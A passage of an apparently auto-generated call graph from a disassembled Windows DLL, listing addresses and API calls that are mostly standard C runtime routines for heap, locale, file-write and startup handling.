__VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 19506->19507 19512 6c544c0c 19506->19512 19507->19506 19511 6c54a83a RtlLeaveCriticalSection 19508->19511 19510 6c5476ac 19510->19463 19510->19468 19511->19510 19515 6c54a83a RtlLeaveCriticalSection 19512->19515 19514 6c544c13 19514->19506 19515->19514 19517 6c533756 19516->19517 19518 6c53afc3 69 API calls 19517->19518 19519 6c533769 19518->19519 19520 6c5360f0 CreateFileW 19519->19520 19521 6c5361de 19520->19521 19524 6c535de6 19520->19524 19522 6c535eba GlobalAlloc 19522->19524 19523 6c5367c3 19524->19520 19524->19522 19524->19523 19526 6c531580 67 API calls 19525->19526 19527 6c532f92 19526->19527 19528 6c5313f0 67 API calls 19527->19528 19529 6c532fc2 __wcsrev 19527->19529 19528->19529 19530 6c532f60 67 API calls 19529->19530 19532 6c532fe0 _wcspbrk 19529->19532 19531 6c53309f 19530->19531 19533 6c5330a7 19531->19533 19534 6c5330bc 19531->19534 19532->18591 19535 6c533370 67 API calls 19533->19535 19536 6c531580 67 API calls 19534->19536 19537 6c5330b8 19535->19537 19538 6c5330c7 19536->19538 19537->18591 19538->18591 19540 6c533386 19539->19540 19541 6c533391 19540->19541 19542 6c5333af 19540->19542 19543 6c531580 67 API calls 19541->19543 19552 6c533680 19542->19552 19544 6c53339a 19543->19544 19544->18596 19549 6c53158f 19547->19549 19548 6c53159c 19548->18597 19549->19548 19550 6c543f43 _memcpy_s 67 API calls 19549->19550 19551 6c5315e1 19550->19551 19551->18597 19553 6c53368b 19552->19553 19554 6c543f43 _memcpy_s 67 API calls 19553->19554 19555 6c5333e6 19554->19555 19555->18596 19557 6c53341f 19556->19557 19558 6c53340e 19556->19558 19557->18603 19565 6c5328d0 LoadResource 19558->19565 19560 6c533416 19560->19557 19561 6c533447 19560->19561 19562 6c5313f0 67 API calls 19560->19562 19563 6c543f43 _memcpy_s 67 API calls 19561->19563 19562->19561 19564 6c53347e 19563->19564 19564->18603 19566 6c5328e6 19565->19566 19567 6c5328e9 LockResource 19565->19567 19566->19560 19568 6c5328f7 SizeofResource 19567->19568 19569 6c53290a 19567->19569 19568->19569 19569->19560 19571 6c53124c 19570->19571 19578 6c544320 19571->19578 19574 6c531286 19581 6c5441a0 19574->19581 19575 6c5313f0 67 API calls 19575->19574 19577 6c531294 19577->18620 19584 6c5442c9 19578->19584 19590 6c544115 19581->19590 19585 6c5442d9 19584->19585 19589 6c531263 19584->19589 19586 6c545348 __commit 67 API calls 19585->19586 19587 6c5442de 19586->19587 19588 6c54815c __commit 6 API calls 19587->19588 19588->19589 19589->19574 19589->19575 19591 6c544122 19590->19591 19592 6c54413f 19590->19592 19593 6c545348 __commit 67 API calls 19591->19593 19594 6c54414c 19592->19594 19596 6c544159 19592->19596 19595 6c544127 19593->19595 19597 6c545348 __commit 67 API calls 19594->19597 19598 6c54815c __commit 6 API calls 19595->19598 19605 6c54401d 19596->19605 19599 6c544151 19597->19599 19603 6c544137 19598->19603 19602 6c54815c __commit 6 API calls 19599->19602 19602->19603 19603->19577 19604 6c545348 __commit 67 API calls 19604->19599 19606 6c54404d 19605->19606 19607 6c54402d 19605->19607 19610 6c54405d 19606->19610 19616 6c54407d 19606->19616 19608 6c545348 __commit 67 API calls 19607->19608 19609 6c544032 19608->19609 19611 6c54815c __commit 6 API calls 19609->19611 19612 6c545348 __commit 67 API calls 19610->19612 19615 6c544042 19611->19615 19613 6c544062 19612->19613 19614 6c54815c __commit 6 API calls 19613->19614 19614->19615 19615->19603 19615->19604 19616->19615 19617 6c5440c4 19616->19617 19620 6c5484f5 19616->19620 19617->19615 19619 6c5484f5 __flsbuf 101 API calls 19617->19619 19619->19615 19641 6c54fbb6 19620->19641 19623 6c548527 19626 6c54852b 19623->19626 19634 6c548538 __flswbuf 19623->19634 19624 6c548510 19625 6c545348 __commit 67 API calls 19624->19625 19632 6c548515 19625->19632 19627 6c545348 __commit 67 API calls 19626->19627 19627->19632 19628 6c548628 19630 6c54f878 __locking 101 API calls 19628->19630 19629 6c5485a8 19631 6c5485bf 19629->19631 19636 6c5485dc 19629->19636 19630->19632 19659 6c54f878 19631->19659 19632->19617 19634->19632 19637 6c54858e 19634->19637 19640 6c548599 19634->19640 19647 6c54f99d 19634->19647 19636->19632 19684 6c54f02c 19636->19684 19637->19640 19656 6c54f954 19637->19656 19640->19628 19640->19629 19642 6c54fbc5 19641->19642 19643 6c548505 19641->19643 19644 6c545348 __commit 67 API calls 19642->19644 19643->19623 19643->19624 19645 6c54fbca 19644->19645 19646 6c54815c __commit 6 API calls 19645->19646 19646->19643 19648 6c54f9aa 19647->19648 19650 6c54f9b9 19647->19650 19649 6c545348 __commit 67 API calls 19648->19649 19651 6c54f9af 19649->19651 19652 6c54f9dd 19650->19652 19653 6c545348 __commit 67 API calls 19650->19653 19651->19637 19652->19637 19654 6c54f9cd 19653->19654 19655 6c54815c __commit 6 API calls 19654->19655 19655->19652 19657 6c54a5c3 __malloc_crt 67 API calls 19656->19657 19658 6c54f969 19657->19658 19658->19640 19660 6c54f884 __commit 19659->19660 19661 6c54f88c 19660->19661 19663 6c54f8a7 19660->19663 19716 6c54535b 19661->19716 19662 6c54f8b5 19665 6c54535b __commit 67 API calls 19662->19665 19663->19662 19668 6c54f8f6 19663->19668 19667 6c54f8ba 19665->19667 19670 6c545348 __commit 67 API calls 19667->19670 19719 6c5519c1 19668->19719 19669 6c545348 __commit 67 API calls 19679 6c54f899 __commit 19669->19679 19672 6c54f8c1 19670->19672 19674 6c54815c __commit 6 API calls 19672->19674 19673 6c54f8fc 19675 6c54f91f 19673->19675 19676 6c54f909 19673->19676 19674->19679 19678 6c545348 __commit 67 API calls 19675->19678 19729 6c54f145 19676->19729 19681 6c54f924 19678->19681 19679->19632 19680 6c54f917 19788 6c54f94a 19680->19788 19682 6c54535b __commit 67 API calls 19681->19682 19682->19680 19685 6c54f038 __commit 19684->19685 19686 6c54f065 19685->19686 19687 6c54f049 19685->19687 19689 6c54f073 19686->19689 19691 6c54f094 19686->19691 19688 6c54535b __commit 67 API calls 19687->19688 19690 6c54f04e 19688->19690 19692 6c54535b __commit 67 API calls 19689->19692 19695 6c545348 __commit 67 API calls 19690->19695 19693 6c54f0b4 19691->19693 19694 6c54f0da 19691->19694 19696 6c54f078 19692->19696 19697 6c54535b __commit 67 API calls 19693->19697 19699 6c5519c1 ___lock_fhandle 68 API calls 19694->19699 19698 6c54f056 __commit 19695->19698 19700 6c545348 __commit 67 API calls 19696->19700 19701 6c54f0b9 19697->19701 19698->19632 19702 6c54f0e0 19699->19702 19703 6c54f07f 19700->19703 19705 6c545348 __commit 67 API calls 19701->19705 19706 6c54f0ed 19702->19706 19707 6c54f109 19702->19707 19704 6c54815c __commit 6 API calls 19703->19704 19704->19698 19709 6c54f0c0 19705->19709 19710 6c54efa7 __lseeki64_nolock 69 API calls 19706->19710 19708 6c545348 __commit 67 API calls 19707->19708 19711 6c54f10e 19708->19711 19712 6c54815c __commit 6 API calls 19709->19712 19714 6c54f0fe 19710->19714 19713 6c54535b __commit 67 API calls 19711->19713 19712->19698 19713->19714 19835 6c54f13b 19714->19835 19717 6c54a206 __getptd_noexit 67 API calls 19716->19717 19718 6c545360 19717->19718 19718->19669 19720 6c5519cd __commit 19719->19720 19721 6c551a28 19720->19721 19724 6c54a914 __lock 67 API calls 19720->19724 19722 6c551a2d RtlEnterCriticalSection 19721->19722 19723 6c551a4a __commit 19721->19723 19722->19723 19723->19673 19725 6c5519f9 19724->19725 19726 6c551a10 19725->19726 19727 6c54e1d3 __ioinit InitializeCriticalSectionAndSpinCount 19725->19727 19791 6c551a58 19726->19791 19727->19726 19730 6c54f154 __write_nolock 19729->19730 19731 6c54f186 19730->19731 19732 6c54f1ad 19730->19732 19762 6c54f17b 19730->19762 19734 6c54535b __commit 67 API calls 19731->19734 19735 6c54f215 19732->19735 19736 6c54f1ef 19732->19736 19733 6c543f34 __invoke_watson 5 API calls 19737 6c54f876 19733->19737 19738 6c54f18b 19734->19738 19740 6c54f229 19735->19740 19795 6c54efa7 19735->19795 19739 6c54535b __commit 67 API calls 19736->19739 19737->19680 19741 6c545348 __commit 67 API calls 19738->19741 19743 6c54f1f4 19739->19743 19742 6c54f99d __flswbuf 67 API calls 19740->19742 19745 6c54f192 19741->19745 19746 6c54f234 19742->19746 19747 6c545348 __commit 67 API calls 19743->19747 19748 6c54815c __commit 6 API calls 19745->19748 19749 6c54f4da 19746->19749 19805 6c54a27f 19746->19805 19750 6c54f1fd 19747->19750 19748->19762 19752 6c54f7a9 WriteFile 19749->19752 19753 6c54f4ea 19749->19753 19751 6c54815c __commit 6 API calls 19750->19751 19751->19762 19757 6c54f4bc 19752->19757 19758 6c54f7dc GetLastError 19752->19758 19755 6c54f5c8 19753->19755 19778 6c54f4fe 19753->19778 19776 6c54f6a8 19755->19776 19780 6c54f5d7 19755->19780 19759 6c54f827 19757->19759 19757->19762 19764 6c54f7fa 19757->19764 19758->19757 19759->19762 19763 6c545348 __commit 67 API calls 19759->19763 19760 6c54f27a 19760->19749 19761 6c54f28c GetConsoleCP 19760->19761 19761->19757 19786 6c54f2af 19761->19786 19762->19733 19768 6c54f84a 19763->19768 19765 6c54f805 19764->19765 19766 6c54f819 19764->19766 19770 6c545348 __commit 67 API calls 19765->19770 19813 6c54536e 19766->19813 19767 6c54f56c WriteFile 19767->19758 19767->19778 19774 6c54535b __commit 67 API calls 19768->19774 19769 6c54f70e WideCharToMultiByte 19769->19758 19771 6c54f745 WriteFile 19769->19771 19775 6c54f80a 19770->19775 19771->19776 19777 6c54f77c GetLastError 19771->19777 19772 6c54f64c WriteFile 19772->19758 19772->19780 19774->19762 19779 6c54535b __commit 67 API calls 19775->19779 19776->19757 19776->19759 19776->19769 19776->19771 19777->19776 19778->19757 19778->19759 19778->19767 19779->19762 19780->19757 19780->19759 19780->19772 19782 6c54f35b WideCharToMultiByte 19782->19757 19784 6c54f38c WriteFile 19782->19784 19783 6c550932 79 API calls __fassign 19783->19786 19784->19758 19784->19786 19785 6c551a88 11 API calls __putwch_nolock 19785->19786 19786->19757 19786->19758 19786->19782 19786->19783 19786->19785 19787 6c54f3e0 WriteFile 19786->19787 19810 6c550984 19786->19810 19787->19758 19787->19786 19834 6c551a61 RtlLeaveCriticalSection 19788->19834 19790 6c54f952 19790->19679 19794 6c54a83a RtlLeaveCriticalSection 19791->19794 19793 6c551a5f 19793->19721 19794->19793 19818 6c55194a 19795->19818 19797 6c54efc5 19798 6c54efcd 19797->19798 19799 6c54efde SetFilePointer 19797->19799 19800 6c545348 __commit 67 API calls 19798->19800 19801 6c54eff6 GetLastError 19799->19801 19803 6c54efd2 19799->19803 19800->19803 19802 6c54f000 19801->19802 19801->19803 19804 6c54536e __dosmaperr 67 API calls 19802->19804 19803->19740 19804->19803 19806 6c54a206 __getptd_noexit 67 API calls 19805->19806 19807 6c54a287 19806->19807 19808 6c54a294 GetConsoleMode 19807->19808 19809 6c545bff __amsg_exit 67 API calls 19807->19809 19808->19749 19808->19760 19809->19808 19831 6c55094c 19810->19831 19814 6c54535b __commit 67 API calls 19813->19814 19815 6c545379 __dosmaperr 19814->19815 19816 6c545348 __commit 67 API calls 19815->19816 19817 6c54538c 19816->19817 19817->19762 19819 6c551957 19818->19819 19820 6c55196f 19818->19820 19821 6c54535b __commit 67 API calls 19819->19821 19823 6c54535b __commit 67 API calls 19820->19823 19830 6c5519b4 19820->19830 19822 6c55195c 19821->19822 19824 6c545348 __commit 67 API calls 19822->19824 19825 6c55199d 19823->19825 19826 6c551964 19824->19826 19827 6c545348 __commit 67 API calls 19825->19827 19826->19797 19828 6c5519a4 19827->19828 19829 6c54815c __commit 6 API calls 19828->19829 19829->19830 19830->19797 19832 6c548659 _LocaleUpdate::_LocaleUpdate 77 API calls 19831->19832 19833 6c55095f 19832->19833 19833->19786 19834->19790 19838 6c551a61 RtlLeaveCriticalSection 19835->19838 19837 6c54f143 19837->19698 19838->19837 19841 6c537352 __EH_prolog3_catch_GS 19839->19841 19840 6c537381 ctype 19845 6c5451c4 19840->19845 19841->19840 19842 6c537202 ctype 2 API calls 19841->19842 19842->19840 19846 6c543f34 __invoke_watson 5 API calls 19845->19846 19847 6c5451ce 19846->19847 19847->19847 19848 6c5572b3 19851 6c538495 19848->19851 19852 6c53aef1 ctype 31 API calls 19851->19852 19853 6c5384a0 19852->19853 19854 6c53c220 ctype 7 API calls 19853->19854 19855 6c5384a9 19854->19855 19856 6c53bbbf ctype 2 API calls 19855->19856 19857 6c5384b4 19856->19857 19858 6c53c292 ctype 3 API calls 19857->19858 19859 6c5384bb 19858->19859 19860 6c54498c 19861 6c544997 19860->19861 19862 6c54499c 19860->19862 19878 6c54be02 19861->19878 19866 6c544896 19862->19866 19865 6c5449aa 19868 6c5448a2 __commit 19866->19868 19867 6c5448ef 19871 6c54493f __commit 19867->19871 19929 6c536894 19867->19929 19868->19867 19868->19871 19882 6c544761 19868->19882 19871->19865 19873 6c536894 ___DllMainCRTStartup 31 API calls 19875 6c544916 19873->19875 19874 6c544761 __CRT_INIT@12 156 API calls 19874->19871 19876 6c544761 __CRT_INIT@12 156 API calls 19875->19876 19877 6c54491f 19876->19877 19877->19871 19877->19874 19879 6c54be34 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 19878->19879 19880 6c54be27 19878->19880 19881 6c54be2b 19879->19881 19880->19879 19880->19881 19881->19862 19883 6c544770 19882->19883 19884 6c5447ec 19882->19884 19933 6c54a6f4 HeapCreate 19883->19933 19886 6c5447f2 19884->19886 19887 6c544823 19884->19887 19892 6c54480d 19886->19892 19919 6c54477b 19886->19919 20066 6c545e85 19886->20066 19888 6c544881 19887->19888 19889 6c544828 19887->19889 19888->19919 20069 6c54a3c8 19888->20069 19891 6c54a0ae ___set_flsgetvalue 8 API calls 19889->19891 19894 6c54482d 19891->19894 19898 6c54b77d __ioterm 68 API calls 19892->19898 19892->19919 19899 6c54a608 __calloc_crt 67 API calls 19894->19899 19897 6c544787 __RTC_Initialize 19905 6c544797 GetCommandLineA 19897->19905 19923 6c54478b 19897->19923 19900 6c544817 19898->19900 19901 6c544839 19899->19901 19903 6c54a0e2 __mtterm 70 API calls 19900->19903 19906 6c54a033 __decode_pointer 6 API calls 19901->19906 19901->19919 19904 6c54481c 19903->19904 19907 6c54a724 __heap_term 4 API calls 19904->19907 19969 6c54bafe 19905->19969 19910 6c544857 19906->19910 19907->19919 19912 6c544875 19910->19912 19913 6c54485e 19910->19913 19916 6c544618 ___wtomb_environ 67 API calls 19912->19916 19915 6c54a11f __mtinit 67 API calls 19913->19915 19914 6c5447b1 19917 6c5447b5 19914->19917 20010 6c54ba43 19914->20010 19918 6c544865 GetCurrentThreadId 19915->19918 19916->19919 20050 6c54a0e2 19917->20050 19918->19919 19919->19867 20044 6c54a724 19923->20044 19924 6c5447d5 19924->19919 20061 6c54b77d 19924->20061 19930 6c5368a2 19929->19930 19932 6c5367cb 19929->19932 19931 6c53aef1 ctype 31 API calls 19930->19931 19930->19932 19931->19932 19932->19873 19932->19877 19934 6c544776 19933->19934 19934->19919 19935 6c54a436 GetModuleHandleW 19934->19935 19936 6c54a451 19935->19936 19937 6c54a44a 19935->19937 19939 6c54a5b9 19936->19939 19940 6c54a45b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 19936->19940 19938 6c545bcf __crt_waiting_on_module_handle 2 API calls 19937->19938 19941 6c54a450 19938->19941 19943 6c54a0e2 __mtterm 70 API calls 19939->19943 19942 6c54a4a4 TlsAlloc 19940->19942 19941->19936 19945 6c54a5be 19942->19945 19946 6c54a4f2 TlsSetValue 19942->19946 19943->19945 19945->19897 19946->19945 19947 6c54a503 19946->19947 20080 6c545e94 19947->20080 19950 6c549fb8 __encode_pointer 6 API calls 19951 6c54a513 19950->19951 19952 6c549fb8 __encode_pointer 6 API calls 19951->19952 19953 6c54a523 19952->19953 19954 6c549fb8 __encode_pointer 6 API calls 19953->19954 19955 6c54a533 19954->19955 19956 6c549fb8 __encode_pointer 6 API calls 19955->19956 19957 6c54a543 19956->19957 20087 6c54a798 19957->20087 19960 6c54a033 __decode_pointer 6 API calls 19961 6c54a564 19960->19961 19961->19939 19962 6c54a608 __calloc_crt 67 API calls 19961->19962 19963 6c54a57d 19962->19963 19963->19939 19964 6c54a033 __decode_pointer 6 API calls 19963->19964 19965 6c54a597 19964->19965 19965->19939 19966 6c54a59e 19965->19966 19967 6c54a11f __mtinit 67 API calls 19966->19967 19968 6c54a5a6 GetCurrentThreadId 19967->19968 19968->19945 19970 6c54bb1c GetEnvironmentStringsW 19969->19970 19971 6c54bb3b 19969->19971 19972 6c54bb24 19970->19972 19973 6c54bb30 GetLastError 19970->19973 19971->19972 19975 6c54bbd4 19971->19975 19976 6c54bb66 WideCharToMultiByte 19972->19976 19977 6c54bb57 GetEnvironmentStringsW 19972->19977 19973->19971 19974 6c54bbdd GetEnvironmentStrings 19978 6c54bbed 19974->19978 19979 6c5447a7 19974->19979 19975->19974 19975->19979 19982 6c54bbc9 FreeEnvironmentStringsW 19976->19982 19983 6c54bb9a 19976->19983 19977->19976 19977->19979 19984 6c54a5c3 __malloc_crt 67 API calls 19978->19984 19995 6c54b529 19979->19995 19982->19979 19985 6c54a5c3 __malloc_crt 67 API calls 19983->19985 19986 6c54bc07 19984->19986 19987 6c54bba0 19985->19987 19988 6c54bc0e FreeEnvironmentStringsA 19986->19988 19989 6c54bc1a _memcpy_s 19986->19989 19987->19982 19990 6c54bba8 WideCharToMultiByte 19987->19990 19988->19979 19993 6c54bc24 FreeEnvironmentStringsA 19989->19993 19991 6c54bbc2 19990->19991 19992 6c54bbba 19990->19992 19991->19982 19994 6c544618 ___wtomb_environ 67 API calls 19992->19994 19993->19979 19994->19991 20094 6c5453bc 19995->20094 19997 6c54b535 GetStartupInfoA 19998 6c54a608 __calloc_crt 67 API calls 19997->19998 20005 6c54b556 19998->20005 19999 6c54b774 __commit 19999->19914 20000 6c54b6f1 GetStdHandle 20006 6c54b6bb 20000->20006 20001 6c54b756 SetHandleCount 20001->19999 20002 6c54a608 __calloc_crt 67 API calls 20002->20005 20003 6c54b703 GetFileType 20003->20006 20004 6c54b63e 20004->19999 20004->20006 20008 6c54b667 GetFileType 20004->20008 20009 6c54e1d3 __ioinit InitializeCriticalSectionAndSpinCount 20004->20009 20005->19999 20005->20002 20005->20004 20005->20006 20006->19999 20006->20000 20006->20001 20006->20003 20007 6c54e1d3 __ioinit InitializeCriticalSectionAndSpinCount 20006->20007 20007->20006 20008->20004 20009->20004 20011 6c54ba5d GetModuleFileNameA 20010->20011 20012 6c54ba58 20010->20012 20014 6c54ba84 20011->20014 20101 6c5502ad 20012->20101 20095 6c54b8a9 20014->20095 20016 6c5447c1 20016->19924 20023 6c54b7cb 20016->20023 20018 6c54bac0 20019 6c54a5c3 __malloc_crt 67 API calls 20018->20019 20020 6c54bac6 20019->20020 20020->20016 20021 6c54b8a9 _parse_cmdline 77 API calls 20020->20021 20022 6c54bae0 20021->20022 20022->20016 20024 6c54b7d4 20023->20024 20026 6c54b7d9 _strlen 20023->20026 20025 6c5502ad ___initmbctable 111 API calls 20024->20025 20025->20026 20027 6c54a608 __calloc_crt 67 API calls 20026->20027 20030 6c5447ca 20026->20030 20032 6c54b80e _strlen 20027->20032 20028 6c54b86c 20029 6c544618 ___wtomb_environ 67 API calls 20028->20029 20029->20030 20030->19924 20038 6c545cbe 20030->20038 20031 6c54a608 __calloc_crt 67 API calls 20031->20032 20032->20028 20032->20030 20032->20031 20033 6c54b892 20032->20033 20035 6c550997 _strcpy_s 67 API calls 20032->20035 20036 6c54b853 20032->20036 20034 6c544618 ___wtomb_environ 67 API calls 20033->20034 20034->20030 20035->20032 20036->20032 20037 6c548034 __invoke_watson 10 API calls 20036->20037 20037->20036 20039 6c545ccc __IsNonwritableInCurrentImage 20038->20039 20388 6c54df82 20039->20388 20041 6c545cea __initterm_e 20043 6c545d09 __IsNonwritableInCurrentImage __initterm 20041->20043 20392 6c5444b4 20041->20392 20043->19924 20045 6c54a784 HeapDestroy 20044->20045 20046 6c54a72d 20044->20046 20045->19919 20047 6c54a772 HeapFree 20046->20047 20048 6c54a749 VirtualFree HeapFree 20046->20048 20047->20045 20048->20048 20049 6c54a771 20048->20049 20049->20047 20051 6c54a0f8 20050->20051 20052 6c54a0ec 20050->20052 20054 6c54a10c TlsFree 20051->20054 20055 6c54a11a 20051->20055 20053 6c54a033 __decode_pointer 6 API calls 20052->20053 20053->20051 20054->20055 20056 6c54a817 20055->20056 20057 6c54a7ff RtlDeleteCriticalSection 20055->20057 20059 6c54a829 RtlDeleteCriticalSection 20056->20059 20060 6c54a837 20056->20060 20058 6c544618 ___wtomb_environ 67 API calls 20057->20058 20058->20055 20059->20056 20060->19923 20062 6c54b786 20061->20062 20063 6c54b7c8 20062->20063 20064 6c54b79a RtlDeleteCriticalSection 20062->20064 20065 6c544618 ___wtomb_environ 67 API calls 20062->20065 20063->19917 20064->20062 20065->20062 20438 6c545d43 20066->20438 20068 6c545e90 20068->19892 20070 6c54a3d6 20069->20070 20071 6c54a421 20069->20071 20074 6c54a3ff 20070->20074 20075 6c54a3dc TlsGetValue 20070->20075 20072 6c54a434 20071->20072 20073 6c54a42b TlsSetValue 20071->20073 20072->19919 20073->20072 20076 6c54a033 __decode_pointer 6 API calls 20074->20076 20075->20074 20077 6c54a3ef TlsGetValue 20075->20077 20078 6c54a416 20076->20078 20077->20074 20461 6c54a299 20078->20461 20081 6c54a02a _doexit 6 API calls 20080->20081 20082 6c545e9c __init_pointers __initp_misc_winsig 20081->20082 20091 6c54cdf3 20082->20091 20085 6c549fb8 __encode_pointer 6 API calls 20086 6c545ed8 20085->20086 20086->19950 20090 6c54a7a3 20087->20090 20088 6c54e1d3 __ioinit InitializeCriticalSectionAndSpinCount 20088->20090 20089 6c54a550 20089->19939 20089->19960 20090->20088 20090->20089 20092 6c549fb8 __encode_pointer 6 API calls 20091->20092 20093 6c545ece 20092->20093 20093->20085 20094->19997 20097 6c54b8c8 20095->20097 20099 6c54b935 20097->20099 20105 6c550a52 20097->20105 20098 6c54ba33 20098->20016 20098->20018 20099->20098 20100 6c550a52 77 API calls _parse_cmdline 20099->20100 20100->20099 20102 6c5502b6 20101->20102 20103 6c5502bd 20101->20103 20210 6c550113 20102->20210 20103->20011 20108 6c5509ff 20105->20108 20111 6c548659 20108->20111 20112 6c54866c 20111->20112 20116 6c5486b9 20111->20116 20113 6c54a27f __getptd 67 API calls 20112->20113 20114 6c548671 20113->20114 20117 6c548699 20114->20117 20119 6c55057a 20114->20119 20116->20097 20117->20116 20134 6c54fe0e 20117->20134 20120 6c550586 __commit 20119->20120 20121 6c54a27f __getptd 67 API calls 20120->20121 20122 6c55058b 20121->20122 20123 6c5505b9 20122->20123 20125 6c55059d 20122->20125 20124 6c54a914 __lock 67 API calls 20123->20124 20126 6c5505c0 20124->20126 20127 6c54a27f __getptd 67 API calls 20125->20127 20150 6c55053c 20126->20150 20129 6c5505a2 20127->20129 20132 6c5505b0 __commit 20129->20132 20133 6c545bff __amsg_exit 67 API calls 20129->20133 20132->20117 20133->20132 20135 6c54fe1a __commit 20134->20135 20136 6c54a27f __getptd 67 API calls 20135->20136 20137 6c54fe1f 20136->20137 20138 6c54a914 __lock 67 API calls 20137->20138 20139 6c54fe31 20137->20139 20140 6c54fe4f 20138->20140 20142 6c54fe3f __commit 20139->20142 20146 6c545bff __amsg_exit 67 API calls 20139->20146 20141 6c54fe98 20140->20141 20143 6c54fe66 InterlockedDecrement 20140->20143 20144 6c54fe80 InterlockedIncrement 20140->20144 20206 6c54fea9 20141->20206 20142->20116 20143->20144 20147 6c54fe71 20143->20147 20144->20141 20146->20142 20147->20144 20148 6c544618 ___wtomb_environ 67 API calls 20147->20148 20149 6c54fe7f 20148->20149 20149->20144 20151 6c550540 20150->20151 20157 6c550572 20150->20157 20152 6c550414 ___addlocaleref 8 API calls 20151->20152 20151->20157 20153 6c550553 20152->20153 20153->20157 20161 6c5504a3 20153->20161 20158 6c5505e4 20157->20158 20205 6c54a83a RtlLeaveCriticalSection 20158->20205 20160 6c5505eb 20160->20129 20162 6c5504b4 InterlockedDecrement 20161->20162 20163 6c550537 20161->20163 20164 6c5504cc 20162->20164 20165 6c5504c9 InterlockedDecrement 20162->20165 20163->20157 20175 6c5502cb 20163->20175 20166 6c5504d6 InterlockedDecrement 20164->20166 20167 6c5504d9 20164->20167 20165->20164 20166->20167 20168 6c5504e6 20167->20168 20169 6c5504e3 InterlockedDecrement 20167->20169 20170 6c5504f0 InterlockedDecrement 20168->20170 20172 6c5504f3 20168->20172 20169->20168 20170->20172 20171 6c55050c InterlockedDecrement 20171->20172 20172->20171 20173 6c55051c InterlockedDecrement 20172->20173 20174 6c550527 InterlockedDecrement 20172->20174 20173->20172 20174->20163 20176 6c55034f 20175->20176 20177 6c5502e2 20175->20177 20178 6c55039c 20176->20178 20179 6c544618 ___wtomb_environ 67 API calls 20176->20179 20177->20176 20186 6c544618 ___wtomb_environ 67 API calls 20177->20186 20203 6c550316 20177->20203 20180 6c552365 ___free_lc_time 67 API calls 20178->20180 20188 6c5503c3 20178->20188 20181 6c550370 20179->20181 20182 6c5503bc 20180->20182 20183 6c544618 ___wtomb_environ 67 API calls 20181->20183 20187 6c544618 ___wtomb_environ 67 API calls 20182->20187 20189 6c550383 20183->20189 20184 6c544618 ___wtomb_environ 67 API calls 20190 6c550344 20184->20190 20185 6c550408 20191 6c544618 ___wtomb_environ 67 API calls 20185->20191 20192 6c55030b 20186->20192 20187->20188 20188->20185 20194 6c544618 67 API calls ___wtomb_environ 20188->20194 20195 6c544618 ___wtomb_environ 67 API calls 20189->20195 20198 6c544618 ___wtomb_environ 67 API calls 20190->20198 20199 6c55040e 20191->20199 20200 6c55253f ___free_lconv_mon 67 API calls 20192->20200 20193 6c544618 ___wtomb_environ 67 API calls 20196 6c55032c 20193->20196 20194->20188 20197 6c550391 20195->20197 20201 6c5524fa ___free_lconv_num 67 API calls 20196->20201 20202 6c544618 ___wtomb_environ 67 API calls 20197->20202 20198->20176 20199->20157 20200->20203 20204 6c550337 20201->20204 20202->20178 20203->20193 20203->20204 20204->20184 20205->20160 20209 6c54a83a RtlLeaveCriticalSection 20206->20209 20208 6c54feb0 20208->20139 20209->20208 20211 6c55011f __commit 20210->20211 20212 6c54a27f __getptd 67 API calls 20211->20212 20213 6c550128 20212->20213 20214 6c54fe0e _LocaleUpdate::_LocaleUpdate 69 API calls 20213->20214 20215 6c550132 20214->20215 20241 6c54feb2 20215->20241 20218 6c54a5c3 __malloc_crt 67 API calls 20219 6c550153 20218->20219 20220 6c550272 __commit 20219->20220 20248 6c54ff2e 20219->20248 20220->20103 20223 6c550183 InterlockedDecrement 20224 6c5501a4 InterlockedIncrement 20223->20224 20227 6c550193 20223->20227 20224->20220 20228 6c5501ba 20224->20228 20225 6c550292 20230 6c545348 __commit 67 API calls 20225->20230 20226 6c55027f 20226->20220 20226->20225 20229 6c544618 ___wtomb_environ 67 API calls 20226->20229 20227->20224 20231 6c544618 ___wtomb_environ 67 API calls 20227->20231 20228->20220 20233 6c54a914 __lock 67 API calls 20228->20233 20229->20225 20230->20220 20232 6c5501a3 20231->20232 20232->20224 20235 6c5501ce InterlockedDecrement 20233->20235 20236 6c55025d InterlockedIncrement 20235->20236 20237 6c55024a 20235->20237 20258 6c550274 20236->20258 20237->20236 20239 6c544618 ___wtomb_environ 67 API calls 20237->20239 20240 6c55025c 20239->20240 20240->20236 20242 6c548659 _LocaleUpdate::_LocaleUpdate 77 API calls 20241->20242 20243 6c54fec6 20242->20243 20244 6c54fed1 GetOEMCP 20243->20244 20245 6c54feef 20243->20245 20247 6c54fee1 20244->20247 20246 6c54fef4 GetACP 20245->20246 20245->20247 20246->20247 20247->20218 20247->20220 20249 6c54feb2 getSystemCP 79 API calls 20248->20249 20250 6c54ff4e 20249->20250 20251 6c54ff59 setSBCS 20250->20251 20254 6c54ff9d IsValidCodePage 20250->20254 20256 6c54ffc2 _memset __setmbcp_nolock 20250->20256 20252 6c543f34 __invoke_watson 5 API calls 20251->20252 20253 6c550111 20252->20253 20253->20223 20253->20226 20254->20251 20255 6c54ffaf GetCPInfo 20254->20255 20255->20251 20255->20256 20261 6c54fc7b GetCPInfo 20256->20261 20387 6c54a83a RtlLeaveCriticalSection 20258->20387 20260 6c55027b 20260->20220 20262 6c54fd61 20261->20262 20265 6c54fcaf _memset 20261->20265 20267 6c543f34 __invoke_watson 5 API calls 20262->20267 20271 6c552323 20265->20271 20269 6c54fe0c 20267->20269 20269->20256 20270 6c552124 ___crtLCMapStringA 102 API calls 20270->20262 20272 6c548659 _LocaleUpdate::_LocaleUpdate 77 API calls 20271->20272 20273 6c552336 20272->20273 20281 6c552169 20273->20281 20276 6c552124 20277 6c548659 _LocaleUpdate::_LocaleUpdate 77 API calls 20276->20277 20278 6c552137 20277->20278 20340 6c551d7f 20278->20340 20282 6c55218a GetStringTypeW 20281->20282 20286 6c5521b5 20281->20286 20283 6c5521aa GetLastError 20282->20283 20284 6c5521a2 20282->20284 20283->20286 20287 6c5521ee MultiByteToWideChar 20284->20287 20304 6c552296 20284->20304 20285 6c55229c 20309 6c554dbc GetLocaleInfoA 20285->20309 20286->20284 20286->20285 20293 6c55221b 20287->20293 20287->20304 20290 6c543f34 __invoke_watson 5 API calls 20291 6c54fd1c 20290->20291 20291->20276 20292 6c5522ed GetStringTypeA 20296 6c552308 20292->20296 20292->20304 20297 6c552230 _memset __crtCompareStringA_stat 20293->20297 20298 6c5449fe _malloc 67 API calls 20293->20298 20295 6c552269 